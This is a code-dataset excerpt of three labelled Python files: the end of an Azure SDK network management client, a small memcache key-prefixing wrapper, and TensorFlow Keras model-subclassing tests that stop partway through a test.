:vartype connection_monitors: azure.mgmt.network.v2019_02_01.operations.ConnectionMonitorsOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.network.v2019_02_01.operations.Operations
:ivar public_ip_addresses: PublicIPAddressesOperations operations
:vartype public_ip_addresses: azure.mgmt.network.v2019_02_01.operations.PublicIPAddressesOperations
:ivar public_ip_prefixes: PublicIPPrefixesOperations operations
:vartype public_ip_prefixes: azure.mgmt.network.v2019_02_01.operations.PublicIPPrefixesOperations
:ivar route_filters: RouteFiltersOperations operations
:vartype route_filters: azure.mgmt.network.v2019_02_01.operations.RouteFiltersOperations
:ivar route_filter_rules: RouteFilterRulesOperations operations
:vartype route_filter_rules: azure.mgmt.network.v2019_02_01.operations.RouteFilterRulesOperations
:ivar route_tables: RouteTablesOperations operations
:vartype route_tables: azure.mgmt.network.v2019_02_01.operations.RouteTablesOperations
:ivar routes: RoutesOperations operations
:vartype routes: azure.mgmt.network.v2019_02_01.operations.RoutesOperations
:ivar bgp_service_communities: BgpServiceCommunitiesOperations operations
:vartype bgp_service_communities: azure.mgmt.network.v2019_02_01.operations.BgpServiceCommunitiesOperations
:ivar service_endpoint_policies: ServiceEndpointPoliciesOperations operations
:vartype service_endpoint_policies: azure.mgmt.network.v2019_02_01.operations.ServiceEndpointPoliciesOperations
:ivar service_endpoint_policy_definitions: ServiceEndpointPolicyDefinitionsOperations operations
:vartype service_endpoint_policy_definitions: azure.mgmt.network.v2019_02_01.operations.ServiceEndpointPolicyDefinitionsOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.network.v2019_02_01.operations.UsagesOperations
:ivar virtual_networks: VirtualNetworksOperations operations
:vartype virtual_networks: azure.mgmt.network.v2019_02_01.operations.VirtualNetworksOperations
:ivar subnets: SubnetsOperations operations
:vartype subnets: azure.mgmt.network.v2019_02_01.operations.SubnetsOperations
:ivar resource_navigation_links: ResourceNavigationLinksOperations operations
:vartype resource_navigation_links: azure.mgmt.network.v2019_02_01.operations.ResourceNavigationLinksOperations
:ivar service_association_links: ServiceAssociationLinksOperations operations
:vartype service_association_links: azure.mgmt.network.v2019_02_01.operations.ServiceAssociationLinksOperations
:ivar virtual_network_peerings: VirtualNetworkPeeringsOperations operations
:vartype virtual_network_peerings: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkPeeringsOperations
:ivar virtual_network_gateways: VirtualNetworkGatewaysOperations operations
:vartype virtual_network_gateways: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkGatewaysOperations
:ivar virtual_network_gateway_connections: VirtualNetworkGatewayConnectionsOperations operations
:vartype virtual_network_gateway_connections: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkGatewayConnectionsOperations
:ivar local_network_gateways: LocalNetworkGatewaysOperations operations
:vartype local_network_gateways: azure.mgmt.network.v2019_02_01.operations.LocalNetworkGatewaysOperations
:ivar virtual_network_taps: VirtualNetworkTapsOperations operations
:vartype virtual_network_taps: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkTapsOperations
:ivar virtual_wans: VirtualWansOperations operations
:vartype virtual_wans: azure.mgmt.network.v2019_02_01.operations.VirtualWansOperations
:ivar vpn_sites: VpnSitesOperations operations
:vartype vpn_sites: azure.mgmt.network.v2019_02_01.operations.VpnSitesOperations
:ivar vpn_sites_configuration: VpnSitesConfigurationOperations operations
:vartype vpn_sites_configuration: azure.mgmt.network.v2019_02_01.operations.VpnSitesConfigurationOperations
:ivar virtual_hubs: VirtualHubsOperations operations
:vartype virtual_hubs: azure.mgmt.network.v2019_02_01.operations.VirtualHubsOperations
:ivar hub_virtual_network_connections: HubVirtualNetworkConnectionsOperations operations
:vartype hub_virtual_network_connections: azure.mgmt.network.v2019_02_01.operations.HubVirtualNetworkConnectionsOperations
:ivar vpn_gateways: VpnGatewaysOperations operations
:vartype vpn_gateways: azure.mgmt.network.v2019_02_01.operations.VpnGatewaysOperations
:ivar vpn_connections: VpnConnectionsOperations operations
:vartype vpn_connections: azure.mgmt.network.v2019_02_01.operations.VpnConnectionsOperations
:ivar p2_svpn_server_configurations: P2SVpnServerConfigurationsOperations operations
:vartype p2_svpn_server_configurations: azure.mgmt.network.v2019_02_01.operations.P2SVpnServerConfigurationsOperations
:ivar p2_svpn_gateways: P2SVpnGatewaysOperations operations
:vartype p2_svpn_gateways: azure.mgmt.network.v2019_02_01.operations.P2SVpnGatewaysOperations
:ivar web_application_firewall_policies: WebApplicationFirewallPoliciesOperations operations
:vartype web_application_firewall_policies: azure.mgmt.network.v2019_02_01.operations.WebApplicationFirewallPoliciesOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: The subscription credentials which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential, # type: "TokenCredential"
subscription_id, # type: str
base_url=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
if not base_url:
base_url = 'https://management.azure.com'
self._config = NetworkManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.application_gateways = ApplicationGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.application_security_groups = ApplicationSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_delegations = AvailableDelegationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_resource_group_delegations = AvailableResourceGroupDelegationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.azure_firewalls = AzureFirewallsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.azure_firewall_fqdn_tags = AzureFirewallFqdnTagsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.ddos_custom_policies = DdosCustomPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.ddos_protection_plans = DdosProtectionPlansOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_endpoint_services = AvailableEndpointServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_authorizations = ExpressRouteCircuitAuthorizationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_peerings = ExpressRouteCircuitPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_connections = ExpressRouteCircuitConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.peer_express_route_circuit_connections = PeerExpressRouteCircuitConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuits = ExpressRouteCircuitsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_service_providers = ExpressRouteServiceProvidersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connections = ExpressRouteCrossConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connection_peerings = ExpressRouteCrossConnectionPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_gateways = ExpressRouteGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_connections = ExpressRouteConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_ports_locations = ExpressRoutePortsLocationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_ports = ExpressRoutePortsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_links = ExpressRouteLinksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.interface_endpoints = InterfaceEndpointsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancers = LoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_backend_address_pools = LoadBalancerBackendAddressPoolsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_frontend_ip_configurations = LoadBalancerFrontendIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.inbound_nat_rules = InboundNatRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_load_balancing_rules = LoadBalancerLoadBalancingRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_outbound_rules = LoadBalancerOutboundRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_network_interfaces = LoadBalancerNetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_probes = LoadBalancerProbesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.nat_gateways = NatGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interfaces = NetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_ip_configurations = NetworkInterfaceIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_load_balancers = NetworkInterfaceLoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_tap_configurations = NetworkInterfaceTapConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_profiles = NetworkProfilesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_security_groups = NetworkSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.security_rules = SecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.default_security_rules = DefaultSecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_watchers = NetworkWatchersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.packet_captures = PacketCapturesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.connection_monitors = ConnectionMonitorsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_addresses = PublicIPAddressesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_prefixes = PublicIPPrefixesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filters = RouteFiltersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filter_rules = RouteFilterRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_tables = RouteTablesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.routes = RoutesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.bgp_service_communities = BgpServiceCommunitiesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policies = ServiceEndpointPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policy_definitions = ServiceEndpointPolicyDefinitionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_networks = VirtualNetworksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.subnets = SubnetsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.resource_navigation_links = ResourceNavigationLinksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_association_links = ServiceAssociationLinksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_peerings = VirtualNetworkPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateways = VirtualNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateway_connections = VirtualNetworkGatewayConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.local_network_gateways = LocalNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_taps = VirtualNetworkTapsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_wans = VirtualWansOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites = VpnSitesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites_configuration = VpnSitesConfigurationOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_hubs = VirtualHubsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.hub_virtual_network_connections = HubVirtualNetworkConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_gateways = VpnGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_connections = VpnConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.p2_svpn_server_configurations = P2SVpnServerConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.p2_svpn_gateways = P2SVpnGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.web_application_firewall_policies = WebApplicationFirewallPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
def _send_request(self, http_request, **kwargs):
# type: (HttpRequest, Any) -> HttpResponse
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.HttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
def close(self):
# type: () -> None
self._client.close()
def __enter__(self):
# type: () -> NetworkManagementClient
self._client.__enter__()
return self
def __exit__(self, *exc_details):
# type: (Any) -> None
self._client.__exit__(*exc_details)
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/_network_management_client.py | Python | mit | 32,278 |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd.
# MIT License. See license.txt
from __future__ import unicode_literals
import memcache, conf
class MClient(memcache.Client):
"""memcache client that will automatically prefix conf.db_name"""
def n(self, key):
return (conf.db_name + ":" + key.replace(" ", "_")).encode('utf-8')
def set_value(self, key, val):
self.set(self.n(key), val)
def get_value(self, key):
return self.get(self.n(key))
def delete_value(self, key):
self.delete(self.n(key)) | rohitw1991/latestadbwnf | webnotes/memc.py | Python | mit | 522 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Model subclassing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras._impl import keras
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.training.rmsprop import RMSPropOptimizer
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class SimpleTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=10):
super(SimpleTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='softmax')
if self.use_dp:
self.dp = keras.layers.Dropout(0.5)
if self.use_bn:
self.bn = keras.layers.BatchNormalization(axis=-1)
def call(self, inputs):
x = self.dense1(inputs)
if self.use_dp:
x = self.dp(x)
if self.use_bn:
x = self.bn(x)
return self.dense2(x)
class MultiIOTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=(2, 3)):
super(MultiIOTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes[0], activation='softmax')
self.dense3 = keras.layers.Dense(num_classes[1], activation='softmax')
if use_dp:
self.dp = keras.layers.Dropout(0.5)
if use_bn:
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x1, x2 = inputs
x1 = self.dense1(x1)
x2 = self.dense1(x2)
if self.use_dp:
x1 = self.dp(x1)
if self.use_bn:
x2 = self.bn(x2)
return [self.dense2(x1), self.dense3(x2)]
class NestedTestModel1(keras.Model):
"""A model subclass nested inside a model subclass.
"""
def __init__(self, num_classes=2):
super(NestedTestModel1, self).__init__(name='nested_model_1')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
self.bn = keras.layers.BatchNormalization()
self.test_net = SimpleTestModel(num_classes=4,
use_bn=True,
use_dp=True)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x) # pylint: disable=not-callable
return self.dense2(x)
def get_functional_graph_model(input_dim, num_classes):
# A simple functional-API model (a.k.a. graph network)
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs)
class NestedTestModel2(keras.Model):
"""A model subclass with a functional-API graph network inside.
"""
def __init__(self, num_classes=2):
super(NestedTestModel2, self).__init__(name='nested_model_2')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
self.bn = self.bn = keras.layers.BatchNormalization()
self.test_net = get_functional_graph_model(32, 4)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x)
return self.dense2(x)
def get_nested_model_3(input_dim, num_classes):
# A functional-API model with a subclassed model inside.
# NOTE: this requires the inner subclass to implement `compute_output_shape`.
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
class Inner(keras.Model):
def __init__(self):
super(Inner, self).__init__()
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(5, activation='relu')
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x = self.dense1(inputs)
x = self.dense2(x)
return self.bn(x)
def compute_output_shape(self, input_shape):
return tensor_shape.TensorShape((input_shape[0], 5))
test_model = Inner()
x = test_model(x) # pylint: disable=not-callable
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs, name='nested_model_3')
class ModelSubclassingTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def test_single_io_workflow_with_np_arrays(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
@test_util.run_in_graph_and_eager_modes()
def test_multi_io_workflow_with_np_arrays(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
def test_single_io_workflow_with_tensors(self):
num_classes = 2
num_samples = 10
input_dim = 50
with self.test_session():
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x = array_ops.ones((num_samples, input_dim))
y = array_ops.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_tensors(self):
num_classes = (2, 3)
num_samples = 10
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = array_ops.ones((num_samples, input_dim))
x2 = array_ops.ones((num_samples, input_dim))
y1 = array_ops.zeros((num_samples, num_classes[0]))
y2 = array_ops.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_numpy_arrays_and_custom_placeholders(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
x2_placeholder = array_ops.placeholder(
dtype='float32', shape=(None, input_dim))
model._set_inputs([x1, x2_placeholder])
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_attributes(self):
# layers, weights, trainable_weights, non_trainable_weights, inputs, outputs
num_classes = (2, 3)
num_samples = 100
input_dim = 50
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
self.assertEqual(model.name, 'test_model')
self.assertEqual(model.built, False)
self.assertEqual(len(model.weights), 0)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
self.assertEqual(model.built, True)
self.assertEqual(len(model.layers), 4)
self.assertEqual(len(model.weights), 10)
self.assertEqual(len(model.trainable_weights), 8)
self.assertEqual(len(model.non_trainable_weights), 2)
self.assertEqual(len(model.inputs), 2)
self.assertEqual(len(model.outputs), 2)
@test_util.run_in_graph_and_eager_modes()
def test_updates(self):
# test that updates get run during training
num_samples = 100
input_dim = 50
class BNNet(keras.Model):
def __init__(self):
super(BNNet, self).__init__()
self.bn = keras.layers.BatchNormalization(beta_initializer='ones',
gamma_initializer='ones')
def call(self, inputs):
return self.bn(inputs)
x = np.ones((num_samples, input_dim))
y = np.ones((num_samples, input_dim))
model = BNNet()
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
y_ref = model.predict(x)
model.train_on_batch(x, y)
y_new = model.predict(x)
self.assertGreater(np.sum(np.abs(y_ref - y_new)), 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_and_inference_behavior(self):
# test that dropout is applied in training and not inference
num_samples = 100
input_dim = 50
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs):
x = self.dp(inputs)
return self.dense(x)
model = DPNet()
x = np.ones((num_samples, input_dim))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_methods(self):
# test fit, train_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
model.fit({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2},
epochs=2, batch_size=32)
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0,
validation_data=([x1, x2], [y1, y2]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
model.train_on_batch({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2})
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_inference_methods(self):
# test predict, evaluate, test_on_batch, predict_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.evaluate([x1, x2], [y1, y2])
model.test_on_batch([x1, x2], [y1, y2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict([x1, x2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict_on_batch([x1, x2])
@test_util.run_in_graph_and_eager_modes()
def test_trainable_mutation(self):
# test that you can change `trainable` on a model or layer, and that
# it freezes the model state during training
# TODO(fchollet): add test after we unify BN behavior in eager and symbolic.
pass
@test_util.run_in_graph_and_eager_modes()
def test_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
y_ref_1, y_ref_2 = model.predict([x1, x2])
fd, fname = tempfile.mkstemp('.h5')
model.save_weights(fname)
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
# need to build the model before loading weights
# (otherwise no weights to load)
model._set_inputs([x1, x2])
model.load_weights(fname)
y1, y2 = model.predict([x1, x2])
self.assertAllClose(y_ref_1, y1, atol=1e-5)
self.assertAllClose(y_ref_2, y2, atol=1e-5)
os.close(fd)
os.remove(fname)
@test_util.run_in_graph_and_eager_modes()
def test_summary(self):
class ToString(object):
def __init__(self):
self.contents = ''
def __call__(self, msg):
self.contents += msg + '\n'
# Single-io
model = SimpleTestModel(num_classes=4, use_bn=True, use_dp=True)
model._set_inputs(np.ones((3, 4))) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 356' in print_fn.contents)
# Multi-io
model = MultiIOTestModel(num_classes=(5, 6), use_bn=True, use_dp=True)
model._set_inputs([np.ones((3, 4)),
np.ones((3, 4))]) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 587' in print_fn.contents)
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = NestedTestModel1(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_graph_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = NestedTestModel2(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_graph(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = get_nested_model_3(input_dim=input_dim, num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 16)
self.assertEqual(
len(model.non_trainable_weights), 4)
self.assertEqual(len(model.trainable_weights), 12)
@test_util.run_in_graph_and_eager_modes()
def test_support_for_manual_training_arg(self):
# In most cases, the `training` argument is left unspecified, in which
# case it defaults to value corresponding to the Model method being used
# (fit -> True, predict -> False, etc).
# If the user writes their model `call` method to take
# an explicit `training` argument, we must check that the correct value
# is being passed to the model for each method call.
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs, training=False):
x = self.dp(inputs, training=training)
return self.dense(x)
model = DPNet()
x = np.ones((10, 10))
y = model.predict(x)
